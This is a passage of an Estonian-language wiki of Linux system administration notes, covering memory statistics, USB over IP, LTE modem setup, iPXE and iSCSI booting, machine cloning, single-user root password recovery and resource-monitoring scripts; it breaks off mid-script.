* total (509172) - kogu RAM (miinus natuke kerneli tarvis)
* used (501192) - kokku kasutusel
* free (7980) - kokku vaba
* buffers (3784) - kasutusel mälust on nii palju kasutusel buffers all
* cached (200248) - kasutusel mälust on nii palju kasutusel failisüsteemi cache'ina
* teisel real on toodud arvutatud used ja free, mis vastavad sellele, kui buffers + cached oleks vastavalt maha lahutatud või juurde liidetud; selline vaade on õigustatud, kuna Linux tuum vajadusel kasutab failisüsteemi cache'iks olevat mälu ressurssi muuks tarbeks

297160 = 501192 - 3784 - 200248
212012 = 7980 + 3784 + 200248

st kasutatud mälu on tegelikult vähem kui näib ja vaba mälu on vastavalt samapalju rohkem kui näib.

====Jõudlus====

Arvuteid on valmistatud kasutes erinevaid tehnoloogiaid ja lisaks muudele erinevustele erinevad nad ka mälu kasutamise kiiruse poolest. Üks võimalus mälu kasutamise jõudlust hinnata nö sünteetilise testiga (st spetsiaalselt selleks tarbeks valmistatud programmo abil), nt

* http://www.cs.virginia.edu/stream/
* https://github.com/gregs1104/stream-scaling

Kasutamiseks tuleb viimaselt lingilt kopeerida tar.gz fail, pakkida arhiiv lahti ning öelda

$ ./stream-scaling

Tulemusena kompileeritakse programm, seejärel käivitatakse ning väljastatakse tulemus, nt

$ ./stream-scaling
=== CPU cache information ===
CPU /sys/devices/system/cpu/cpu0 Level 1 Cache: 32K (Data)
CPU /sys/devices/system/cpu/cpu0 Level 1 Cache: 32K (Instruction)
CPU /sys/devices/system/cpu/cpu0 Level 2 Cache: 6144K (Unified)
...
Total CPU system cache: 25296896 bytes
Suggested minimum array elements needed: 11498589
Array elements used: 11498589

=== CPU Core Summary ===
processor : 3
model name : Intel(R) Core(TM)2 Quad CPU Q9550 @ 2.83GHz
cpu MHz : 1998.000
siblings : 4

=== Testing up to 4 cores ===
...
-------------------------------------------------------------
Function Rate (MB/s) Avg time Min time Max time
Copy: 4101.0477 0.0453 0.0449 0.0456
Scale: 4121.7264 0.0451 0.0446 0.0458
Add: 4982.5056 0.0557 0.0554 0.0560
Triad: 5001.9268 0.0556 0.0552 0.0561
-------------------------------------------------------------
Solution Validates
-------------------------------------------------------------

Number of Threads requested = 2
Function Rate (MB/s) Avg time Min time Max time
Triad: 5002.6618 0.0566 0.0552 0.0610

Number of Threads requested = 3
Function Rate (MB/s) Avg time Min time Max time
Triad: 4892.7425 0.0577 0.0564 0.0607

Number of Threads requested = 4
Function Rate (MB/s) Avg time Min time Max time
Triad: 4784.1065 0.0582 0.0577 0.0589

Mälu jõudlust on eriti mõtet hinnata selleks, et võrrelda olemasolevat süsteemi uuega, millega olemasolev kavatsetakse asendada.

===Ressursikasutuse haldamine===

* IO

# ionice -c 3 -p 1919

* CPU

# renice ...

===Protsesside haldamine===

Kasutaja postgres protsesside nimekirja nimekirja esitamine

# ps -a -f -u postgres

Kasutaja postgres protsesside ja vastavate lõimede nimekirja esitamine

# ps -aLf -u postgres

====Protsesside grupp====

TODO

<pre>
# ps -efj | less
</pre>

===pdftk kasutamine===

pdftk http://www.pdflabs.com/docs/install-pdftk/ paigaldamiseks sobib öelda

# apt-get install pdftk

===tvtime kasutamine===

# apt-get install tvtime

ning näidata

Please choose the TV standard to use -> PAL
Please choose the frequency table to use -> Custom (must run tvtime-scanner first)
Please choose the video4linux device which corresponds to your capture card -> /dev/video0
Please choose the device that will be used in NTSC areas for decoding closed captions and XDS channel information; Device to use for VBI decoding -> /dev/vbi0
Please choose whether tvtime should be "setuid root", therefore getting root privileges when running -> No

Esmalt tuleb laadida TV kaardile vastav draiver, nt selliselt

# rmmod saa7134
# modprobe saa7134 card=21 tuner=26

kus

* card sobiv valik tagab pildi
* tuner sobiv valik tagab heli

Seejärel skaneerida kanalid

$ tvtime-scanner
Reading configuration from /etc/tvtime/tvtime.xml
Scanning using TV standard PAL.
Scanning from 44.00 MHz to 958.00 MHz.
Found a channel at 607.00 MHz (605.50 - 608.25 MHz), adding to channel list.
I/O warning : failed to load external entity "/home/imre/.tvtime/stationlist.xml"
station: No station file found, creating a new one.

ning käivitada tvtime programm

# tvtime

Kasulikud lisamaterjalid

* https://sites.google.com/site/jobinau2/saa7130basedtvtunercardunderlinux

===PAM===

TODO

====Kasutaja autentimine pam_unix abil====

/etc/shadow failis on üldiselt toetatud sellised räsid

* $1$ - MD5
* $2a$ - blowfish
* $5$ - SHA-256
* $6$ - SHA-512

Kui osutab, et /etc/shadow ei tööta, st nt peale süsteemi uuendamist kasutaja sisestab õige parooli kuid ei saa sisse logida, siis tõenäoliselt ei sobi kokku /etc/pam.d/* seadistusfailid /etc/shadow sisuga.

Kasulikud lisamaterjalid

* http://digitalconsumption.com/forum/615-Blowfish-shadow-files-on-Debian

===Gnome-shell===

Gnome shell http://en.wikipedia.org/wiki/GNOME_Shell on ... ja kasutamine eeldab

* 3D toega videokaardi olemasolu, kusjuures kaart peab nö sobima (nt Radeon HD 3600 fglrx draiveriga annab vigu nö olulises kohas, GeForce 7600 GS nouveau draiveriga sobib)

Olulised asjad

* extensions
* gnome-tweak-tool

===USB over IP===

USB over IP tarkvara http://usbip.sourceforge.net/ abil saab teha ühe arvuti füüsilised USB seadme üle võrgu kasutatavaks teisest avutist.

Praktiliselt voib olla hada sellest, et user space ja kernel space tarkvara ei sobi kokku. Nt tundub, et Ubuntu (sh v. 14.04) paketihalduses on usbip v. 0.7, aga tuumas talle vajalikke mooduleid pole. Teine variant on, et kasutada saab usbip v. 1.1, millega tuuma moodulid naikse paremini kokku sobivat. Debian Jessie sisaldab 2014 aasta suvel v. 1.1 tarvkara ja see paistab töötavat.

====Tööpõhimõte====

TODO

====Tarkvara paigaldamine====

Tarkvara paigladamiseks sobib mõlemas arvuti öelda

# apt-get install usbip

Paigaldamise tulemusena tekib failisysteemi muu hulgas

* usbip - utiliit serveri seadistamiseks ja kliendi juhtimiseks
* usbipd - serveri poolel tootav deemon

====Serveri poole ettevalmistamine ja käivitamine====

Laadida moodulid

server:~# modprobe usbip_core
server:~# modprobe usbip_host

Käivitada usbipd deemon, kuulab vaikimisi 3240/tcp pordil

server:~# usbipd

USB seadmete serveris olevate USB seadmete nimekirja esitamiseks sobib öelda

server:~# usbip list --local
Local USB devices
=================
- busid 1-1 (8087:0024)
Intel Corp. : Integrated Rate Matching Hub (8087:0024)
1-1:1.0 -> hub

- busid 1-1.2 (0781:5530)
SanDisk Corp. : Cruzer (0781:5530)
1-1.2:1.0 -> usb-storage

- busid 1-1.4 (0424:2514)
Standard Microsystems Corp. : USB 2.0 Hub (0424:2514)
1-1.4:1.0 -> hub

- busid 1-1.4.3 (046d:c31d)
Logitech, Inc. : Media Keyboard K200 (046d:c31d)
1-1.4.3:1.0 -> usbhid
1-1.4.3:1.1 -> usbhid

- busid 1-1.4.4 (046d:c05a)
Logitech, Inc. : M90/M100 Optical Mouse (046d:c05a)
1-1.4.4:1.0 -> usbhid

- busid 1-1.5 (04e6:e001)
SCM Microsystems, Inc. : SCR331 SmartCard Reader (04e6:e001)
1-1.5:1.0 -> usbfs

Seadme eksportimiseks sobib oelda, nt Cruizer USB pulk jaoks

server:~# usbip bind -b 1-1.2
bind device on busid 1-1.2: complete

Tulemusena on --list väljundis vastav seade

- busid 1-1.2 (0781:5530)
SanDisk Corp. : Cruzer (0781:5530)
1-1.2:1.0 -> usbip-host

====Kliendi poole ettevalmistamine ja käivitamine====

Laadida moodul

klient:~# modprobe vhci_hcd

Eksporditud seadmete nimekirja küsimiseks sobib öelda kliendi arvutis

klient:~# usbip list -r 192.168.10.10
Exportable USB devices
======================
- 192.168.10.10
1-1.2: SanDisk Corp. : Cruzer (0781:5530)
: /sys/devices/pci0000:00/0000:00:07.0/usb1/1-1/1-1.2
: (Defined at Interface level) (00/00/00)
: 0 - Mass Storage / SCSI / Bulk-Only (08/06/50)

Seadme kasutamiseks

klient:~# usbip attach -r 192.168.10.10 -b 1-1.2

Seejärel on seade paistab nagu kohalik seade ja on valmis kasutamiseks, nt

klient:~# lsusb
Bus 009 Device 004: ID 0781:5530 SanDisk Corp. Cruzer
..

ja usbip spetsiifilisemalt

klient:~# usbip port
Imported USB devices
====================
Port 00: <Port in Use> at High Speed(480Mbps)
unknown vendor : unknown product (0781:5530)
9-1 -> usbip://192.168.10.10:3240/1-1.2
-> remote bus/dev 001/037

Kasutamise lõpetamiseks sobib öelda kasutades vhci_hcd pordi numbrit

klient:~# usbip detach --port=0

====Serveri poolel kasutamise lõpetamine====

Peale seda kui kliendi pool on seadme kasutamine lõpetatud, öelda

server:~# usbip unbind -b 1-1.2
unbind device on busid 1-1.2: complete

====Kasulikud lisamaterjalid====

* http://www.howtoforge.com/how-to-set-up-a-usb-over-ip-server-and-client-with-debian-lenny
* https://www.kernel.org/doc/readme/drivers-staging-usbip-userspace-README

===Töötamine failisüsteemiga===

Tavaliselt on häda miinus märgiga failidega töötamisel, -- võtme kasutamine aitab, nt '-failinimi' nimelise faili kustutamisel

$ rm -- -failinimi

===USB netipulga kasutamine===

USB netipulga kasutamine koosneb kahest osast

* arvutis peavad olema /dev/ttyUSB* nimelised usb serial seadmed
* ppp ühenduse loomiseks tuleb kasutada sobivat programmi, wvdial, Gnome desktopilt midagi vms

====Tööpõhimõte====

Kui netipulk ei tööta automaatselt, siis võib olla probleem selles, et süsteem tunneb ta ära storage seadmena ja mitte võrguseadmena

<pre>
[11360165.312014] usb 1-4: new high-speed USB device number 10 using ehci-pci
[11360165.458578] usb 1-4: New USB device found, idVendor=12d1, idProduct=1505
[11360165.458734] usb 1-4: New USB device strings: Mfr=3, Product=2, SerialNumber=0
[11360165.458900] usb 1-4: Product: HUAWEI Mobile
[11360165.459001] usb 1-4: Manufacturer: Huawei Technologies
[11360165.460790] usb-storage 1-4:1.0: USB Mass Storage device detected
[11360165.461082] scsi10 : usb-storage 1-4:1.0
[11360166.461381] scsi 10:0:0:0: CD-ROM HUAWEI Mass Storage 2.31 PQ: 0 ANSI: 0
[11360166.478285] sr1: scsi-1 drive
[11360166.478582] sr 10:0:0:0: Attached scsi CD-ROM sr1
[11360166.478694] sr 10:0:0:0: Attached scsi generic sg5 type 5
</pre>

usb-modeswitch paketi tarkvara teeb temast võrguseadme.

====/dev/ttyUSB* seadmete tekitamine====

E392 kirjaga netipulk paistab faili usb.ids tõttu

# grep 1505 /var/lib/usbutils/usb.ids
1505 E398 LTE/UMTS/GSM Modem/Networkcard

lsusb väljundis E398

Bus 001 Device 041: ID 12d1:1505 Huawei Technologies Co., Ltd. E398 LTE/UMTS/GSM Modem/Networkcard

Kusjuures /dev kataloogis pole usb serialile vastavaid faili, st /dev/ttyUSB* nimelisi.

Kasutamiseks sobib tekitada fail

# cat /etc/usb_modeswitch.d/12d1\:1505
# Huawei E392

DefaultVendor= 0x12d1
DefaultProduct= 0x1505

TargetVendor= 0x12d1
TargetProductList=0x1506

MessageContent="55534243123456780000000000000011062000000100000000000000000000"

ning lisada faili /lib/udev/rules.d/40-usb_modeswitch.rules lõpupoole rida

# Huawei E392
ATTRS{idVendor}=="12d1", ATTRS{idProduct}=="1505", RUN+="usb_modeswitch '%b/%k'"

Seejärel võtta pulk usb pesast välja ja uuesti sisse panna, lsusb väljundis peaks nüüd olema, 1506 -> 1505 muutunud

Bus 001 Device 043: ID 12d1:1506 Huawei Technologies Co., Ltd. E398 LTE/UMTS/GSM Modem/Networkcard

ning lisaks tekkinud seadmed

# ls -ld /dev/ttyUSB*
crw-rw---- 1 root dialout 188, 0 Dec 20 01:27 /dev/ttyUSB0
crw-rw---- 1 root dialout 188, 1 Dec 20 01:16 /dev/ttyUSB1
crw-rw---- 1 root dialout 188, 2 Dec 20 01:16 /dev/ttyUSB2

Tundub, et kui systemd millegipärast ei taha käivitada sobib öelda

# /usr/sbin/usb_modeswitch --default-vendor 0x12d1 --default-product 0x1505 -J

====wvdial kasutamine====

# cat /etc/wvdial.conf
[Dialer Defaults]
Phone =
Username =
Password =
New PPPD = yes

Modem Type = Analog Modem
Phone = *99#
ISDN = 0
Baud = 460800
Username = " "
Password = " "
Modem = /dev/ttyUSB0
Init1 = ATZ
Init2 = at+cgdcont=1,"ip","internet.emt.ee"
Stupid Mode = 1

kus

* TODO

käivitamiseks sobib öelda

# wvdial
--> WvDial: Internet dialer version 1.61
--> Initializing modem.
--> Sending: ATZ
ATZ
OK
--> Sending: at+cgdcont=1,"ip","internet.emt.ee"
at+cgdcont=1,"ip","internet.emt.ee"
OK
--> Modem initialized.
--> Sending: ATDT*99#
--> Waiting for carrier.
ATDT*99#
CONNECT
--> Carrier detected. Starting PPP immediately.
--> Starting pppd at Fri Dec 20 01:35:25 2013
--> Pid of pppd: 17139
--> Using interface ppp0
--> local IP address 10.128.53.223
--> remote IP address 10.64.64.64
--> primary DNS address 217.71.33.151
--> secondary DNS address 217.71.33.150

Tulemusena tekib ppp0 seade üle mille saab liiklust ruutida (teiste arvutite liiklust tuleb src nat'tida)

# ifconfig ppp0
ppp0 Link encap:Point-to-Point Protocol
inet addr:10.128.77.124 P-t-P:10.64.64.64 Mask:255.255.255.255
UP POINTOPOINT RUNNING NOARP MULTICAST MTU:1500 Metric:1
RX packets:7 errors:0 dropped:0 overruns:0 frame:0
TX packets:8 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:3
RX bytes:70 (70.0 B) TX bytes:157 (157.0 B)

====Kasulikud lisamaterjalid====

* http://trisquel.info/en/forum/install-huawei-e392-usb-lte-drivers
* http://www.draisberghof.de/usb_modeswitch/bb/viewtopic.php?t=681
* http://blog.bluedrive.ro/?p=28
* http://www.draisberghof.de/usb_modeswitch/
* https://bugs.launchpad.net/ubuntu/+source/network-manager/+bug/889878
* http://importgeek.wordpress.com/tag/12d11505/
* http://www.draisberghof.de/usb_modeswitch/bb/
* http://oliver.tele2.ee/kuidas-huawei-e1752-ja-ubuntu-10-04-kasikaes-internetti-lahevad/
* http://www.draisberghof.de/usb_modeswitch/bb/viewtopic.php?f=4&t=891&p=5898&hilit=12d1%3A1505#p5898

===zip arhivaatori kasutamine===

Parooliga kaitstud arhiivi moodustamiseks sobib öelda nt

$ zip -r --password parool katalooginimi.zip katalooginimi

===Pipe viewer===

Pipe viewer programmiga saab jälgida läbi toru mineva progressi. Paigaldamiseks sobib öelda

# apt-get install pv

Kasutamine paistab välja sedasi

# timeout 10 cat /dev/zero | pv > /dev/null
4GB 0:00:07 [1.91GB/s] [ <=>
..

===AUFS===

AUFS http://aufs.sourceforge.net/ võimaldab mitme kataloogi sisu esitada ühes nö virtuaalses kataloogis. Alternatiivne võimalus on seda saavutada UnionFS abil.

# mount -t aufs -o dirs=/tmp/kata1:/tmp/kata2:/root/kata3 none /tmp/dir

===Network manager===

Lisaks Network manager graafilisele kasutajaliidesele on olemas ka käsurea utiliit nmcli

# nmcli -p dev
================================================
Status of devices
================================================
DEVICE TYPE STATE CONNECTION
------------------------------------------------
docker0 bridge connected docker0
vetha88a ethernet connected vetha88a
br0 openvswitch connected br0
br3 openvswitch connected br3
tep0 openvswitch connected tep0
eth0 ethernet unmanaged --
lo loopback unmanaged --
ovs-system openvswitch unmanaged --

===Skänneri kasutamine===

# apt-get install

Kasulikud lisamaterjalid

* https://help.ubuntu.com/community/ScanningHowTo
* http://www.sane-project.org/sane-backends.html

===Logrotate===

Näitab, mis toimub, aga midagi failisüsteemis vms ei tee

# logrotate -d /etc/logrotate.conf

Teeb nö jõuga

# logrotate -f /etc/logrotate.conf

Roteeritud failide nimedes kuupäeva kasutamiseks sobib logrotate seadistusfailide vastavates sektsioonides kasutada lisaks rida

dateext

Tulemuseks on nt

/var/log/apache2/access.log-20140922.gz

===iPXE===

Käesolevas tekstis mainitud dhcp serveri tarkvarana sobib kasutada paketti

# apt-get install isc-dhcp-server

ja tftpd serverina paketti

# apt-get install atftpd

iPXE tarkvara paketist

# apt-get install ipxe

====Tööpõhimõte====

Kui on kasutada nö tavalise PXE toega võrgukaardiga arvuti, siis üks viis iPXE tarkvara kasutamiseks on laadida see dhcp + tftp serverilt, nt sellise sektsiooniga

host hp.auul {
hardware ethernet 64:31:50:6c:c0:b4;
fixed-address 192.168.10.41;
option broadcast-address 192.168.10.255;
option routers 192.168.10.254;

filename "undionly.kpxe";
next-server 192.168.10.10;
option domain-name-servers 10.192.0.53;
}

kus

* undionly.kpxe - paketist 'apt-get install ipxe'

Tulemusena ilmub vastava arvuti ekraanile iPXE ja Ctrl-B abil saab siseneda iPXE keskkonda. Nt võrgust Debian Jessie installeri käivitamine toimub sedasi

chain http://ftp.imool.ee/pub/incoming/imre/dj-install.ipxe

kus pöördutaval aadressil on tekst sisuga

# cat dj-install.ipxe
#!ipxe
kernel http://ftp.nl.debian.org/debian/dists/jessie/main/installer-amd64/current/images/netboot/debian-installer/amd64/linux
initrd http://ftp.nl.debian.org/debian/dists/jessie/main/installer-amd64/current/images/netboot/debian-installer/amd64/initrd.gz
boot

Seejärel käivitab Debian installer. Paistab, et Jessie oskab iSCSI peale paigaldada.

'chain' ütlemist saab automatiseerida nt sellise DHCP serveri sektsiooniga

host hp.auul {
hardware ethernet 64:31:50:6c:c0:b4;
fixed-address 192.168.10.41;
option broadcast-address 192.168.10.255;
option routers 192.168.10.254;

next-server 192.168.10.10;
option domain-name-servers 10.192.0.53;
if exists user-class and option user-class = "iPXE" {
filename "http://ftp.imool.ee/pub/incoming/imre/ipxe";
} else {
filename "undionly.kpxe";
}
}

* esmalt klient arvuti töötab PXE abil DHCP kliendina ja laaditakse undionly.kpxe
* seejärel klient arvuti töötab iPXE abil DHCP kliendina ja pöördutakse http://ftp.imool.ee/pub/incoming/imre/ipxe poole

====Debian v. 8 Jessie kasutamine diskless iSCSI kliendina====

Üks praktiline vajadus iPXE jaoks on iSCSI ressursi kautamine juurfailisüsteemina. Selleks sobib Debian v. 8 Jessie paigaldada eelmises punktis näidatud viisil ja failisüsteemid paigutada iSCSI peale. Paigaldatud arvuti käivitamiseks sobib kasutada sellist iPXE skripti

# cat scsi-boot.ipxe
#!ipxe

dhcp
set initiator-iqn iqn.1993-08.org.debian:01:6f3ac5994d50
sanboot iscsi:10.1.1.15::::iqn.2000-01.com.synology:syno-varundus-1.imretest.989d9f15bf

kus

* TODO

mis laaditakse dchp serveri seadistusfailist reaga

..
filename "http://ftp.imool.ee/pub/incoming/imre/iscsi-boot.ipxe";
...

Kui Debian Jessie peaks bootimisel jääma initramfs prompti, siis võib aidata käsitsi sobivate argumentidega öelda

# iscsistart ...

või pärida iPXE käest

# iscsistart -b

kus

* -t - ...

====Kasulikud lisamaterjalid====

* http://backreference.org/2013/12/23/diskless-iscsi-boot-with-pxe-howto/
* http://www.heath-bar.com/blog/?p=184
* http://etherboot.org/wiki/sanboot/debian_lenny_iscsi
* http://ipxe.org/cmd/sanboot
* http://wiki.openelec.tv/index.php/Network_Boot_-_iSCSI
* http://jpmens.net/2011/07/18/network-booting-machines-over-http/

===D-Bus===

D-Bus http://www.freedesktop.org/wiki/Software/dbus/ ...

D-Bus peal toimuva jälgimiseks sobib kasutada nt d-feet programmi

# apt-get install d-feet

[[Pilt:D-feet-1.gif]]

PlayPause toggleb pausi ja jätkamise vahel, selle rakendamist võib klõpsida hiirega ja öelda Execute või käsurealt

$ dbus-send --print-reply --session --dest=org.mpris.MediaPlayer2.vlc /org/mpris/MediaPlayer2 org.mpris.MediaPlayer2.Player.PlayPause
method return sender=:1.913 -> dest=:1.917 reply_serial=2

Samal ajal ütleb dbus-monitor filtreeridest välja töötavale vlc eksemplarile (:1.913) vastused

$ dbus-monitor "sender=:1.913"
...
method return sender=:1.913 -> dest=:1.978 reply_serial=2
signal sender=:1.913 -> dest=(null destination) serial=88 path=/org/mpris/MediaPlayer2; \
interface=org.freedesktop.DBus.Properties; member=PropertiesChanged
string "org.mpris.MediaPlayer2.Player"
array [
dict entry(
string "PlaybackStatus"
variant string "Paused"
)
]
array [
]

Kasulikud lisamaterjalid

* https://wiki.gnome.org/Apps/DFeet
* http://en.wikipedia.org/wiki/D-Bus

===Debian paigaldamine UEFI arvutisse===

Olgu eesmärk paigadada UEFI firmwarega arvutisse Debian v. 8 Jessie, kusjuures kasutatakse kahe füüsilise kõvakettaga mdadm RAID1 lülitust. System setup keskkonnnas näidata moel või teisel, et arvuti töötab UEFI (mitte BIOS emulatsiooni vms) režiimis. Esimeseks boot valikuks valida UEFI shell. Shellis öelda

> fs0:\BOOT\EFI\BOOT...

Tulemusena käivitub Debian Installer (DI), kus tuleb seadistada selline kõvaketaste kasutus

* /dev/sda1 ja /dev/sdb1 - EFI System Partitionid, 512 MB
* /dev/sda2 ja /dev/sdb2 - mdadm mirror, 2 GB, kus hakkab paiknema /boot failisüsteem
* /dev/sda3 ja /dev/sdb3 - mdadm mirror, 24 GB, kus hakkab paiknema operatsioonisüsteem, LVM köidetel
* /dev/system/swap ja /dev/system/root - asub mdadm peal
* /dev/sda4 ja /dev/sdb4 jne - juurutatakse operatsioonisüsteemi keskkonnas

Tundub, et selliselt ettevalmistatud kõvakettakasutusest saab DI hästi aru ja tulemusena tekib selline süsteem

# df
Filesystem 1K-blocks Used Available Use% Mounted on
/dev/dm-0 11403544 938660 9862568 9% /
udev 10240 0 10240 0% /dev
tmpfs 1631032 8724 1622308 1% /run
tmpfs 4077572 0 4077572 0% /dev/shm
tmpfs 5120 0 5120 0% /run/lock
tmpfs 4077572 0 4077572 0% /sys/fs/cgroup
/dev/md0 1888268 35564 1738736 3% /boot
/dev/sda1 497696 148 497548 1% /boot/efi

Partitsioonid sellised

# parted /dev/sda p
Model: ATA ST2000NM0033-9ZM (scsi)
Disk /dev/sda: 2000GB
Sector size (logical/physical): 512B/512B
Partition Table: gpt
Disk Flags:

Number Start End Size File system Name Flags
1 1049kB 512MB 511MB fat32 efsname boot, esp
2 512MB 2511MB 2000MB sda2part raid
3 2511MB 26.5GB 24.0GB sda3part raid

Lõpuks tuleb kopeerida /dev/sdb1 peale /dev/sda1 failisüsteemi sisu (EFI GRUB bootloader).

# efibootmgr
BootCurrent: 0003
Timeout: 1 seconds
BootOrder: 0003,0009,000D,0000,0001,0002
Boot0000* ATEN Virtual CDROM YS0J
Boot0001* IBA GE Slot 0300 v1404
Boot0002* P0: ST2000NM0033-9ZM175
Boot0003* debian
Boot0009* UEFI: Built-in EFI Shell
Boot000D* UEFI: ATEN Virtual CDROM YS0J

===Arvuti kloonimine===

Arvuti kloonimise tulemusena moodustatakse olemasoleva arvuti tarkvaralisest seistust, st operatsioonisüsteem ja seal töötavad rakendused, töötav koopia. Sõltuvalt asjaoludest, nt kui koopia töötab samas võrgus ja samal ajal lähtepunktiks oleva arvutiga, peab talle seadistama erineva ip aadressi. Kloonimise põhjuseks võib olla nt soov taha arenduspartnerile kättesaadavaks täpselt samasugune seis arvutist nagu on juba kasutada, sel juhul jääb ära vähem või rohkem keerukas arvuti ettevalmistamise aeg, mis kuluks operatsioonisüsteemi ja rakendusprogrammide seaditamisele.

====Kloonimine failisüsteemi kopeerimise teel====

Kloonimiseks on rikkalikult võimalusi, käesolev juhtum kirjeldab kloonimist failisüsteemi kopeerimise teel

* valida välja sobiv klooniks saav arvuti, piisava protsessori, kõvakette, mälu, võrgu jms ressursiga
* käivitada puhas uus klooniks saav arvuti (füüsiline või virtuaalne) systemrescue cd plaadilt
* moodustada fdisk partitsioonid
* tekitada lvm
* tekitada failisüsteemid ja swap

# mkfs.ext4 /dev/sda1
# mkfs.ext4 /dev/system/root
# mkswap -f /dev/system/swap

* ühendada failisüsteemid külge

# mkdir /mnt/root
# mount /dev/system/root
# mkdir /mnt/root/boot
# mount /dev/sda1 /mnt/root/boot

* seadistada võrk
* veenduda, et lähtepunktiks olevas arvutis on klooni riistvara jaoks vajalikud draiverid ja muuud komponendid olemas (LVM, mdadm tugi jms)
* kopeerida rsync abil üle failisüsteem, vajalike eranditega (nt /proc, /sys, /home)

orig# rsync -avHXA --exclude --exclude-deleted --numeric-ids --exclude-from=/root/ex / root@x.x.x.x:/mnt/root/

* tekitada käsitsi excludetud kataloogid

# mkdir proc sys home tmp
# chmod 1777 tmp

* kohendada seadistusfaile

/etc/fstab
/etc/network/interfaces
/etc/udev/rules.d/70-persistent-net.rules

* ühendada külgeühendatud failisüsteemid lahti
* rebootida valikuda 'Boot Linux from hard disk'
* paigaldada bootloader

# install-grub --recheck --no-floppy /dev/sda

* bootida paigaldatud bootloaderi promptist käsitsi

grub> linux /vmlinuz... root=/dev/mapper/system-root ro
grub> initrd /initrd...
grub> boot

* genereerida /boot/grub/grub.conf

# update-grub

====Kopeeritud süsteemi korrastamine====

Kopeeritud süsteemi edasiandmisel võib olla asjakohane pöörata tähelepanu sellistele asjaoludele, st kas ei anta edasi soovimatult palju andmeid

* kasutajate kodukataloogid (.ssh, .pgpass jt)
* root, postgres jt süsteemsete ja muidu alles jäänud kasutajate .bash_history failid

# history -c
# rm .bash_history
...

* cron tööd (/etc/cron.*/*, crontab -l. /var/spool/cron ...)
* /var/backups (passwd.bak, shadow.pak jt)
* varunduse tarkvara agent (nt backupninja)
* monitooringu tarkvara agent (nt zabbix)
* liidestus AD vms keskse kasutajahalduse süsteemiga
* konfiguratsioooni halduse agent (nt puppet)
* logiserverisse logimine
* /tmp, /var/tmp kataloogide sisu
* /var/mail
* /usr/src

===USB data bridge kasutamine===

USB data bridge on kahe otsaga ja keskel asuvad punniga USB kaabel, mille abil saab kaks arvutit omavahel ühendada andmevahetuseks. Üks populaarne kaabel paistab välja sedasi

# lsusb
Bus 001 Device 005: ID 067b:2501 Prolific Technology, Inc. PL2501 USB-USB Bridge (USB 2.0)

Tundub, et Debiani tuumas on mitme sarnase kaabli tugi, aga mitte päris PL2501 oma. Toe tekitamist kirjeldatakse aadressil https://lkml.org/lkml/2012/7/23/106. Muudatuste tegemiseks sobib kasutada tekstis http://www.auul.pri.ee/wiki/Operatsioonis%C3%BCsteemi_Debian_GNU/Linux_paketihalduse_kasutamine#Tuuma_kompileerimine kirjeldatud protseduuri.

Peale mooduli laadimist tekib võrguseade

# ifconfig usb0
usb0 Link encap:Ethernet HWaddr a2:68:73:e5:d6:6e
inet6 addr: fe80::a068:73ff:fee5:d66e/64 Scope:Link
...

Kasulikud lisamaterjalid

* http://paulswasteland.blogspot.com.ee/2014/01/getting-prolific-pl-2501-based-usb-to.html

===Single user ehk ühekasutaja režiim===

Juhtumil, kui arvutisse ei saa root kasutajana sisse logida ja pole ka root parooli teada, et konsoolilt sisse logida, saab kasutada single user režiimi ja seal root parool muuta. Selleks tuleb

* GRUB bootloaderis liikuda nooltega meelepärase boot valiku peale
* vajutada e nagu edit (see on ekraani all kirjas)
* liikuda kernel parameetri juurde ja lisada kõige lõppu juurde tühik ning seejärel

init=/bin/bash

* valida ctrl-x vms (see on ekraani all kirjas) ja arvuti bootida

Tulemusena jõuab arvuti välja nn single user prompti. Selles olekus töötab arvutis suhteliselt vähe protsesse, juurfailisüsteem on monteeritud read-only olekus, võrk on seadistamata jne. root kasutaja või mõni muu kasutaja parooli seadmiseks tuleb

* monteerida juurfailisüsteem read-write olekusse

# mount -o rw,remount /
# passwd kasutajanimi
# sync
# mount -o ro,remount /
# sync
# oodata 30 sekundit
# reboot -f

Seejärel peaks saama seda uut parooli kasutada.

===Ksplice kasutamine===

Kasulikud lisamaterjalid

* https://oss.oracle.com/pipermail/ksplice-debian-8.0-updates/

===Arvuti ressursikasutuse kaardistamine===

Protsessid

# ps auxef

Avatud failid

# lsof -n -p PID
# lsof -n -u USER

Võrgusoketid

# lsof -i TCP
# lsof -i UDP
# lsof -U - unix domain sockets

Semafoorid

# ipcs -u

------ Shared Memory Status --------
segments allocated 2
pages allocated 4309411
pages resident 4136103
pages swapped 169536
Swap performance: 0 attempts 0 successes

------ Semaphore Status --------
used arrays = 64
allocated semaphores = 1083

------ Messages Status --------
allocated queues = 0
used headers = 0
used space = 0 bytes

Nt sellise skript kasutamine cron tööna kord minutis võiks koguda midagi, lisaks sar andmestikule

<pre>
# cat /opt/osres/bin/osres.sh
#!/bin/bash

AEG=`date +%Y%m%d-%H%M%S`;
LOG="/var/log/osres";

if test -f /tmp/osres.lock; then
echo "protsess kaib" >> /tmp/osres.log
# echo "kaivitame crontabist osres" >> /tmp/osres.log
else

touch /tmp/osres.lock
echo "protsess kaivitatakse" >> /tmp/osres.log

timeout 20 ps auxef >> ${LOG}/ps-auxef_${AEG}.log
AEG=`date +%Y%m%d-%H%M%S`;
timeout 20 lsof -n >> ${LOG}/lsof-n_${AEG}.log
AEG=`date +%Y%m%d-%H%M%S`;
timeout 20 ipcs -a >> ${LOG}/ipcs-a_${AEG}.log
AEG=`date +%Y%m%d-%H%M%S`;
timeout 20 ipcs -u >> ${LOG}/ipcs-u_${AEG}.log
AEG=`date +%Y%m%d-%H%M%S`;
timeout 20 netstat -anp >> ${LOG}/netstat-anp_${AEG}.log
AEG=`date +%Y%m%d-%H%M%S`;
timeout 20 conntrack -L >> ${LOG}/conntrack-L_${AEG}.log
AEG=`date +%Y%m%d-%H%M%S`;
timeout 20 touch /var/lib/postgresql/iocheck/io_${AEG}
AEG=`date +%Y%m%d-%H%M%S`;
timeout 20 ping -c 4 127.0.0.1 > ${LOG}/ping_127.0.0.1_${AEG}.log
AEG=`date +%Y%m%d-%H%M%S`;
timeout 20 ping -c 4 10.0.6.73 > ${LOG}/ping_10.0.6.73_${AEG}.log
AEG=`date +%Y%m%d-%H%M%S`;
timeout 20 ssh root@127.0.0.1 "date > ${LOG}/touch-over-ssh_${AEG}.log"
AEG=`date +%Y%m%d-%H%M%S`;
timeout 20 dig @10.0.9.4 auul.pri.ee soa >> ${LOG}/dig-10.0.9.4-auul.pri.ee-soa_${AEG}.log
AEG=`date +%Y%m%d-%H%M%S`;
export PGPASSWORD="xxx"
